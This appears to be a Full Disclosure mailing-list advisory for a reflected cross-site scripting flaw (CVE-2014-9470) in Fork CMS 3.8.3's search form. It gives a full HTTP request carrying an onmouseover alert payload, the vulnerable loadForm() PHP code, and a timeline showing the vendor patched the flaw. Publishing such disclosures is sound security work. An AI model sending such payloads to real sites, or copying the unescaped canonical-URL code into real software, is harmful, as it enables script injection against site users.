# Exploit Title: XSS Vulnerability in Fork CMS 3.8.3 # Google Dork: N/A # Date: 12/26/2014 # Exploit Author: Le Ngoc phi (phi.n...@itas.vn) and ITAS Team (www.itas.vn) # Vendor Homepage: http://www.fork-cms.com # Software Link: http://www.fork-cms.com/blog/detail/fork-3.8.4-released # Version: Fork 3.8.3 # Tested on: N/A # CVE : CVE-2014-9470 ::VULNERABILITY DETAIL:: - Vulnerable parameter: q_widget - Vulnerable file: src/Frontend/Modules/Search/Actions/Index.php - Vulnerable function: loadForm() - Attack vector: GET /en/search?form=search&q_widget="onmouseover="alert('XSS')"&submit=Search HTTP/1.1 Host: forkcms.local User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: track=s%3A32%3A%22f0affe38cada8e7de19ad2edf36f92a6%22%3B; __utma=23748525.1232410121.1415937482.1419392332.1419480017.3; __utmz=23748525.1419480017.3.3.utmcsr=google|utmccn=(organic)|utmcmd=organic |utmctr=(not%20provided); track=s%3A32%3A%22f0affe38cada8e7de19ad2edf36f92a6%22%3B; frontend_language=s%3A2%3A%22en%22%3B; _ga=GA1.2.1232410121.1415937482; PHPSESSID=gailpg881ubvtsmroh2p1bfqn5 Connection: keep-alive - Vulnerable code: private function loadForm() { // create form $this->frm = new FrontendForm('search', null, 'get', null, false); // could also have been submitted by our widget if (!\SpoonFilter::getGetValue('q', null, '')) { $_GET['q'] = \SpoonFilter::getGetValue('q_widget', null, ''); } // create elements $this->frm->addText( 'q', null, 255, 'inputText liveSuggest autoComplete', 'inputTextError liveSuggest autoComplete' ); // since we know the term just here we should set the canonical url here $canonicalUrl = SITE_URL . FrontendNavigation::getURLForBlock('Search'); if (isset($_GET['q']) && $_GET['q'] != '') { $canonicalUrl .= '?q=' . $_GET['q']; } $this->header->setCanonicalUrl($canonicalUrl); } ::DISCLOSURE:: - 12/25/2014: Detected vulnerability - 12/25/2014: Inform vendor and the vendor confirmed - 12/26/2014: Vendor releases patch - 12/26/2014: ITAS Team publishes information ::REFERENCE:: - http://www.itas.vn/news/itas-team-found-out-a-cross-site-scripting-vulnerabi lity-in-fork-cms-70.html - https://github.com/forkcms/forkcms/issues/1018s - https://github.com/forkcms/forkcms/commit/4a7814762adf4f56f932d95146c7e4126d 872114 ::DISCLAIMER:: THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK. ITAS Team ITAS Corp. Be protected with us Office : 24 Dang Thai Mai St., Ward 7, Phu Nhuan District, HCMC. Tel : +84 - 8 - 38931952 Hotline : 0903445711 Email : <mailto:i...@itas.vn> i...@itas.vn <http://www.itas.vn/> www.itas.vn ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/